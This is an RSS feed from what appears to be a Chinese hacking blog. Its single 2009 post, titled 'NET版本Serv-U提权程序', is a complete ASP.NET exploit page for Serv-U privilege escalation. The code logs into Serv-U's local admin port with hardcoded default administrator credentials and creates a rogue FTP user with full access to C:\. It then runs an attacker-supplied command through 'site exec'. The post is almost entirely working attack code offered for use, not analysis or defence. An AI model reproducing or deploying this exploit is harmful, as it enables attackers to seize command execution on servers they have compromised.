<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>P9's BLOG &#187; serv-u</title>
	<atom:link href="http://www.p9.net.cn/tag/serv-u/feed" rel="self" type="application/rss+xml" />
	<link>http://www.p9.net.cn</link>
	<description>同一天地间,同一网络下,P9'Blog与您共享今日互联网→WWW.P9.NET.CN</description>
	<lastBuildDate>Thu, 28 Apr 2011 23:57:55 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>NET版本Serv-U提权程序</title>
		<link>http://www.p9.net.cn/sec/net-serv-u.html</link>
		<comments>http://www.p9.net.cn/sec/net-serv-u.html#comments</comments>
		<pubDate>Wed, 11 Mar 2009 02:59:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[serv-u]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=774</guid>
		<description><![CDATA[&#60;%@ Page Language=&#8221;VB&#8221; Debug=&#8221;true&#8221; %&#62;
&#60;%@ import Namespace=&#8221;System.Net.Sockets&#8221; %&#62;
&#60;script runat=&#8221;server&#8221;&#62;
    &#8216; 
    &#8216; Love, Where are you ?
    Sub BTN_Start_Click(sender As Object, e As EventArgs)
        Dim Usr As String = Text_Name.Text
        Dim pwd [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.p9.net.cn/tag/提权"><img class="alignright size-full wp-image-639" title="tiquan" src="http://www.p9.net.cn/wp-content/uploads/2009/03/tiquan.png" alt="tiquan" width="90" height="100" /></a>&lt;%@ Page Language=&#8221;VB&#8221; Debug=&#8221;true&#8221; %&gt;<br />
&lt;%@ import Namespace=&#8221;System.Net.Sockets&#8221; %&gt;<br />
&lt;script runat=&#8221;server&#8221;&gt;</p>
<p>    &#8216; <span id="more-774"></span><br />
    &#8216; Love, Where are you ?</p>
<p>    Sub BTN_Start_Click(sender As Object, e As EventArgs)<br />
        Dim Usr As String = Text_Name.Text<br />
        Dim pwd As String = Text_PWD.Text<br />
        Dim Port As Int32 = Text_Port.Text<br />
        Dim Command As String = Text_cmd.Text</p>
<p>        Dim LoginUser As String = &#8220;User &#8221; &amp; Usr &amp; vbcrlf<br />
        Dim LoginPass As String = &#8220;Pass &#8221; &amp; pwd &amp; vbcrlf<br />
        Dim NewDomain As String = &#8220;-SETDOMAIN&#8221; &amp; vbcrlf &amp; &#8220;-Domain=cctv|0.0.0.0|43859|-1|1|0&#8243; &amp; vbcrlf &amp; &#8220;-TZOEnable=0&#8243; &amp; vbcrlf &amp; &#8221; TZOKey=&#8221; &amp; vbcrlf<br />
        Dim DelDomain As String = &#8220;-DELETEDOMAIN&#8221; &amp; vbcrlf &amp; &#8220;-IP=0.0.0.0&#8243; &amp; vbcrlf &amp; &#8221; PortNo=43859&#8243; &amp; vbcrlf<br />
        Dim NewUser AS String = &#8220;-SETUSERSETUP&#8221; &amp; vbcrlf &amp; &#8220;-IP=0.0.0.0&#8243; &amp; vbcrlf &amp; &#8220;-PortNo=43859&#8243; &amp; vbcrlf &amp; &#8220;-User=lake&#8221; &amp; vbcrlf &amp; &#8220;-Password=admin123&#8243; &amp; vbcrlf &amp; _<br />
                    &#8220;-HomeDir=c:\\&#8221; &amp; vbcrlf &amp; &#8220;-LoginMesFile=&#8221; &amp; vbcrlf &amp; &#8220;-Disable=0&#8243; &amp; vbcrlf &amp; &#8220;-RelPaths=1&#8243; &amp; vbcrlf &amp; _<br />
                    &#8220;-NeedSecure=0&#8243; &amp; vbcrlf &amp; &#8220;-HideHidden=0&#8243; &amp; vbcrlf &amp; &#8220;-AlwaysAllowLogin=0&#8243; &amp; vbcrlf &amp; &#8220;-ChangePassword=0&#8243; &amp; vbcrlf &amp; _<br />
                    &#8220;-QuotaEnable=0&#8243; &amp; vbcrlf &amp; &#8220;-MaxUsersLoginPerIP=-1&#8243; &amp; vbcrlf &amp; &#8220;-SpeedLimitUp=0&#8243; &amp; vbcrlf &amp; &#8220;-SpeedLimitDown=0&#8243; &amp; vbcrlf &amp; _<br />
                    &#8220;-MaxNrUsers=-1&#8243; &amp; vbcrlf &amp; &#8220;-IdleTimeOut=600&#8243; &amp; vbcrlf &amp; &#8220;-SessionTimeOut=-1&#8243; &amp; vbcrlf &amp; &#8220;-Expire=0&#8243; &amp; vbcrlf &amp; &#8220;-RatioUp=1&#8243; &amp; vbcrlf &amp; _<br />
                    &#8220;-RatioDown=1&#8243; &amp; vbcrlf &amp; &#8220;-RatiosCredit=0&#8243; &amp; vbcrlf &amp; &#8220;-QuotaCurrent=0&#8243; &amp; vbcrlf &amp; &#8220;-QuotaMaximum=0&#8243; &amp; vbcrlf &amp; _<br />
                    &#8220;-Maintenance=System&#8221; &amp; vbcrlf &amp; &#8220;-PasswordType=Regular&#8221; &amp; vbcrlf &amp; &#8220;-Ratios=None&#8221; &amp; vbcrlf &amp; &#8221; Access=c:\\|RWAMELCDP&#8221; &amp; vbcrlf<br />
        Dim Quit As String = &#8220;QUIT&#8221; &amp; vbcrlf<br />
        Dim MAINTENANCE As String = &#8220;SITE MAINTENANCE&#8221; &amp; vbcrlf</p>
<p>        &#8216;Dim client As New TcpClient<br />
        Dim tcpClient As New TcpClient()<br />
        Try<br />
            tcpClient.Connect(&#8220;127.0.0.1&#8243;, port)<br />
        Catch eee As Exception<br />
            response.write(eee.ToString())<br />
            response.end<br />
        End Try<br />
        tcpClient.ReceiveBufferSize = 1024<br />
        Dim networkStream As NetworkStream = tcpClient.GetStream()<br />
        Rec(networkStream)<br />
        Send(networkStream, LoginUser)<br />
        Rec(networkStream)<br />
        Send(networkStream, LoginPass)<br />
        Rec(networkStream)<br />
        Send(networkStream, MAINTENANCE)<br />
        Rec(networkStream)<br />
        Send(networkStream, DelDomain)<br />
        Rec(networkStream)<br />
        Send(networkStream, NewDomain)<br />
        Rec(networkStream)<br />
        Send(networkStream, NewUser)<br />
        Rec(networkStream)<br />
               Dim tcpClient2 As New TcpClient()<br />
               Try<br />
                   tcpClient2.Connect(&#8220;127.0.0.1&#8243;, 43859)<br />
               Catch eee As Exception<br />
                   response.write(eee.ToString())<br />
                   response.end<br />
               End Try<br />
               tcpClient2.ReceiveBufferSize = 1024<br />
               Dim networkStream2 As NetworkStream = tcpClient2.GetStream()<br />
               Rec(networkStream2)<br />
               Send(networkStream2, &#8220;User lake&#8221; &amp; vbcrlf)<br />
               Rec(networkStream2)<br />
               Send(networkStream2, &#8220;pass admin123&#8243; &amp; vbcrlf)<br />
               Rec(networkStream2)<br />
               Send(networkStream2, &#8220;site exec &#8221; &amp; Command &amp; vbcrlf)<br />
               Rec(networkStream2)<br />
               tcpClient2.Close()<br />
        Send(networkStream, DelDomain)<br />
        Rec(networkStream)<br />
        Send(networkStream, Quit)<br />
        Rec(networkStream)<br />
        tcpClient.Close()<br />
    End Sub</p>
<p>    Sub Rec(o As Object)<br />
       If o.CanRead Then<br />
          Dim bytes(1024) As Byte<br />
          o.Read(bytes, 0, 1024)<br />
          Dim returndata As String = Encoding.ASCII.GetString(bytes)<br />
          response.Write(&#8220;out:&#8221; &amp; returndata &amp; &#8220;&lt;br&gt;&#8221;)<br />
       Else<br />
          response.Write(&#8220;What&#8217;s wrong ?&#8221;)<br />
       End If<br />
    End Sub</p>
<p>    Sub Send(o As Object,data As String)<br />
       If o.CanWrite Then<br />
          Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)<br />
          o.Write(sendBytes, 0, sendBytes.Length)<br />
          response.write(&#8220;in: &#8221; &amp; data &amp; &#8220;&lt;br&gt;&#8221;)<br />
       Else<br />
          response.Write(&#8220;What&#8217;s wrong ?&#8221;)<br />
       End If<br />
    End Sub</p>
<p>&lt;/script&gt;<br />
&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;/head&gt;<br />
&lt;body&gt;<br />
    &lt;form runat=&#8221;server&#8221;&gt;<br />
        &lt;p&gt;<br />
            &lt;asp:Label id=&#8221;Label1&#8243; runat=&#8221;server&#8221; width=&#8221;353px&#8221; forecolor=&#8221;Blue&#8221;&gt;from Serv-U 2<br />
            admin by lake2&lt;/asp:Label&gt;<br />
        &lt;/p&gt;<br />
        &lt;p&gt;<br />
            &lt;asp:Label id=&#8221;Label2&#8243; runat=&#8221;server&#8221; width=&#8221;40px&#8221;&gt;Name&lt;/asp:Label&gt;<br />
            &lt;asp:TextBox id=&#8221;Text_Name&#8221; runat=&#8221;server&#8221; Width=&#8221;152px&#8221;&gt;LocalAdministrator&lt;/asp:TextBox&gt;<br />
            &lt;br /&gt;<br />
            &lt;asp:Label id=&#8221;Label3&#8243; runat=&#8221;server&#8221; width=&#8221;40px&#8221;&gt;PWD&lt;/asp:Label&gt;<br />
            &lt;asp:TextBox id=&#8221;Text_PWD&#8221; runat=&#8221;server&#8221;&gt;#l@$ak#.lk;0@P&lt;/asp:TextBox&gt;<br />
            &lt;br /&gt;<br />
            &lt;asp:Label id=&#8221;Label4&#8243; runat=&#8221;server&#8221; width=&#8221;40px&#8221;&gt;Port&lt;/asp:Label&gt;<br />
            &lt;asp:TextBox id=&#8221;Text_Port&#8221; runat=&#8221;server&#8221;&gt;43958&lt;/asp:TextBox&gt;<br />
            &lt;br /&gt;<br />
            &lt;asp:Label id=&#8221;Label5&#8243; runat=&#8221;server&#8221; width=&#8221;40px&#8221;&gt;cmd&lt;/asp:Label&gt;<br />
            &lt;asp:TextBox id=&#8221;Text_cmd&#8221; runat=&#8221;server&#8221;&gt;&lt;/asp:TextBox&gt;<br />
        &lt;/p&gt;<br />
        &lt;p&gt;<br />
            &lt;asp:Button id=&#8221;BTN_Start&#8221; onclick=&#8221;BTN_Start_Click&#8221; runat=&#8221;server&#8221; Text=&#8221;Start&#8221;&gt;&lt;/asp:Button&gt;<br />
        &lt;/p&gt;<br />
        &lt;p&gt;<br />
            &lt;hr /&gt;<br />
            &lt;!&#8211; Insert content here &#8211;&gt;<br />
        &lt;/p&gt;<br />
    &lt;/form&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=774&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_774" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/net-serv-u.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

